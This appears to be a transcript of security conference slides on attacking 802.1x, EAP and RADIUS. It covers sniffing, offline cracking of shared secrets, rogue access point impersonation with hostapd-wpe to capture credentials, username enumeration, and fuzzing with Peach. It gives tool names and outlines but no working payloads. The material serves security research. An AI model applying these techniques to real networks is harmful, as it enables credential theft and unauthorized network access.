802.1x and beyond! - black hat briefings · 2015-05-28 · clear-text data user-name avp/eap ident...
TRANSCRIPT
802.1x and
BEYOND!
Brad Antoniewicz
www.foundstone.com
Copyright © 2014
McAfee, Inc. 2 [email protected] @brad_anton @foundstone
Hi, I’m @brad_anton
www.foundstone.com
Copyright © 2014
McAfee, Inc. 3 [email protected] @brad_anton @foundstone
Agenda
About 802.1x
Attacks
Fuzzing/Tools
www.foundstone.com
Copyright © 2014
McAfee, Inc. 4 [email protected] @brad_anton @foundstone
■ SZ
y
IEEE 802.1x Port-Based network access control
Cause not everyone is welcome at church?
www.foundstone.com
Copyright © 2014
McAfee, Inc. 5 [email protected] @brad_anton @foundstone
Supplicant Authenticator Authentication Server
Flow (IEEE 802.1x)
www.foundstone.com
Copyright © 2014
McAfee, Inc. 6 [email protected] @brad_anton @foundstone
Wireless Client
Access Point
RADIUS Server
802.11
www.foundstone.com
Copyright © 2014
McAfee, Inc. 7 [email protected] @brad_anton @foundstone
Wired Client
Network Switch
RADIUS Server
Ethernet
www.foundstone.com
Copyright © 2014
McAfee, Inc. 8 [email protected] @brad_anton @foundstone
TRUSTED UNTRUSTED
www.foundstone.com
Copyright © 2014
McAfee, Inc. 9 [email protected] @brad_anton @foundstone
What if I….
Cisco ACS 4.2
www.foundstone.com
Copyright © 2014
McAfee, Inc. 10 [email protected] @brad_anton @foundstone
`
EAP Extensible Authentication Protocol
RFC3748
www.foundstone.com
Copyright © 2014
McAfee, Inc. 11 [email protected] @brad_anton @foundstone
EAP
802.1x
(Layer 2)
www.foundstone.com
Copyright © 2014
McAfee, Inc. 12 [email protected] @brad_anton @foundstone
EAP
Type:
PEAP, EAP-TTLS,
EAP-FAST, etc.. (Layer 2)
www.foundstone.com
Copyright © 2014
McAfee, Inc. 13 [email protected] @brad_anton @foundstone
EAP
RADIUS
www.foundstone.com
Copyright © 2014
McAfee, Inc. 14 [email protected] @brad_anton @foundstone
DALAI LAMA
www.foundstone.com
Copyright © 2014
McAfee, Inc. 15 [email protected] @brad_anton @foundstone
(layer 3)
RADIUS
www.foundstone.com
Copyright © 2014
McAfee, Inc. 16 [email protected] @brad_anton @foundstone
RADIUS Remote Access Dial-In User Service
DSL/Dialup VPN
RFC2865/2869
www.foundstone.com
Copyright © 2014
McAfee, Inc. 17 [email protected] @brad_anton @foundstone
Integration User Database
Active Directory
SecurID
LDAP
www.foundstone.com
Copyright © 2014
McAfee, Inc. 18 [email protected] @brad_anton @foundstone
Surface
www.foundstone.com
Copyright © 2014
McAfee, Inc. 19 [email protected] @brad_anton @foundstone
Surface
External Auth Handler
RADIUS/EAP/Types 802.1x/EAP/Types
(Protocol/Configuration/Handling issues)
www.foundstone.com
Copyright © 2014
McAfee, Inc. 20 [email protected] @brad_anton @foundstone
Surface Mgmt Web UI
Mgmt Web UI Mgmt Web UI
www.foundstone.com
Copyright © 2014
McAfee, Inc. 21 [email protected] @brad_anton @foundstone
Attacks
www.foundstone.com
Copyright © 2014
McAfee, Inc. 22 [email protected] @brad_anton @foundstone
Sniffing
Offline Brute-Force Shared Secret/User-Password: john
CHAP: hashcat
EAP Data..: asleap, and eapmd5pass
Clear-text Data User-name AVP/Eap Ident
NAS-Id
Calling-Station
State
no need to be fancy, just
use Wireshark
(Protocol Issue)
www.foundstone.com
Copyright © 2014
McAfee, Inc. 23 [email protected] @brad_anton @foundstone
(Configuration Issue)
Impersonation
Attacker Controlled
www.foundstone.com
Copyright © 2014
McAfee, Inc. 24 [email protected] @brad_anton @foundstone
(Configuration Issue)
FreeRADIUS-WPE
www.foundstone.com
Copyright © 2014
McAfee, Inc. 25 [email protected] @brad_anton @foundstone
(Configuration Issue)
hostapd-wpe https://github.com/OpenSecurityResearch/hostapd-wpe
• Supports Tons of EAP-Types (including EAP-FAST Phase 0)
• Always Returns EAP-Success
• Requests PAP first
• Responds to all 802.11 probe requests
• Heartbleed (Cupid)
• Saves to file/outputs NETNTLM format
Thanks to JoMo-Kun, @lgrangeia, and @haxorthematrix for
Patches/Functionality and improvement suggestions
www.foundstone.com
Copyright © 2014
McAfee, Inc. 27 [email protected] @brad_anton @foundstone
RADIUS/EAP/802.1x
Fuzz
www.foundstone.com
Copyright © 2014
McAfee, Inc. 28 [email protected] @brad_anton @foundstone
Peach
Overview DataModel
StateModel
Publisher
Agent Agent
Transformers,
mutators, etc.. Targets
www.foundstone.com
Copyright © 2014
McAfee, Inc. 29 [email protected] @brad_anton @foundstone
DataModels EAP
Eap.xml
EapFast.xml
EapGtc.xml
EapLeap.xml
EapMd5.xml
EapMschapv2.xml
EapPeap.xml
EapTls.xml
EapTlv.xml
RADIUS
Radius.xml
Supporting
Protocols
Tls.xml
Mschapv2.xml
Utilities
Utils.xml
802.1x
Ieee802.1x.xml
www.foundstone.com
Copyright © 2014
McAfee, Inc. 30 [email protected] @brad_anton @foundstone
DataModel
Radius.xml
Cisco ACS
StateModel
Tests
VS DataModel
TekRADIUS
StateModel
Tests
VS DataModel
MS NPS/IAS
StateModel
Tests
VS DataModel
SBR/FreeRadius
StateModel
Tests
VS DataModel
Fuzzers
UDPPublisher
www.foundstone.com
Copyright © 2014
McAfee, Inc. 32 [email protected] @brad_anton @foundstone
Publishers
all via wired, supports all tunneled EAP Types
RadiusPublisher Eap.xml
RadiusPeapPublisher Eap.xml
EthernetPeapPublisher Eap.xml
RawEthernetPublisher Ieee8021x.xml
TL
S
www.foundstone.com
Copyright © 2014
McAfee, Inc. 33 [email protected] @brad_anton @foundstone
Surface Mgmt Web UI
Mgmt Web UI Mgmt Web UI
StringMutator.Data.cs: namespace Peach.Core.Mutators { public partial class StringMutator { static readonly string[] values = new string[] {
LDAP Injection XSS SQL Injection CMD Injection etc… } }
www.foundstone.com
Copyright © 2014
McAfee, Inc. 34 [email protected] @brad_anton @foundstone
RADIUS/802.1x/EAP
www.foundstone.com
Copyright © 2014
McAfee, Inc. 35 [email protected] @brad_anton @foundstone
Tools
Existing: libeap
Pyradius
Releasing: Radius .Net (forked)
Eap .Net
OpenSSL .NET ..i know.. “ugh .Net”
www.foundstone.com
Copyright © 2014
McAfee, Inc. 36 [email protected] @brad_anton @foundstone
Libz
OpenSSL.NET (Fork) SslUdp SslClient = new SslUdp(false) SslUdp SslSvr= new SslUdp(pub, priv, true) SslSvr.Send(ePkt.RawData)
Eap.NET (New) RadiusEapSession eClient = new RadiusEapSession(host, secret) EthernetEapSession eSvr = new EthernetEapSession(dev, pub, priv) EapPacket ePkt = new EapPacket(bytes) // Recv EapPacket ePkt = new EapPacket(Code, Type, ID); ePkt.SetEapData(bytes);
www.foundstone.com
Copyright © 2014
McAfee, Inc. 37 [email protected] @brad_anton @foundstone
Profiling
AVP-State (RADIUS)
Maintains State of the Connection
Active/Passive
Cisco: “acs/Number/Number”
MS NPS: 38 Bytes
EAP-Res/Ident Username
MS NPS: Will reject if ! valid
Others: Doesn’t matter
Msg-Auth. (RADIUS)
Cisco: Ignores
Others: Access-Reject
RadiusEapProfiler.exe
www.foundstone.com
Copyright © 2014
McAfee, Inc. 38 [email protected] @brad_anton @foundstone
Brute-Force
Password a.k.a Active Brute
Force (..meh)
Usernames NPS: Eap-Resp/Identity
EAP-Type Client Downgrade
eapEnum.exe
Or Enumeration …whatever
www.foundstone.com
Copyright © 2014
McAfee, Inc. 39 [email protected] @brad_anton @foundstone
wpa_supplicant-wpe enumeration/profiles/exploits
TODO
www.foundstone.com
Copyright © 2014
McAfee, Inc. 40 [email protected] @brad_anton @foundstone
■ Don’t try to fuzz EAP over WiFi or using
wpa_supplicant or through an authenticator
■ eapol_test is great (“make eapol_test“ in
wpa_supplicant)
■ netsh lan reconnect will start a 802.1x
connection on Windows 7 and 8.1
■ +hpa +ust to find the real goodies
Notes for the researchers
www.foundstone.com
Copyright © 2014
McAfee, Inc. 41 [email protected] @brad_anton @foundstone
Exploitation
&
www.foundstone.com
Copyright © 2014
McAfee, Inc. 42 [email protected] @brad_anton @foundstone
? @brad_anton
*many of the pics in this presentation were found on the
internet – credit goes to images.google.com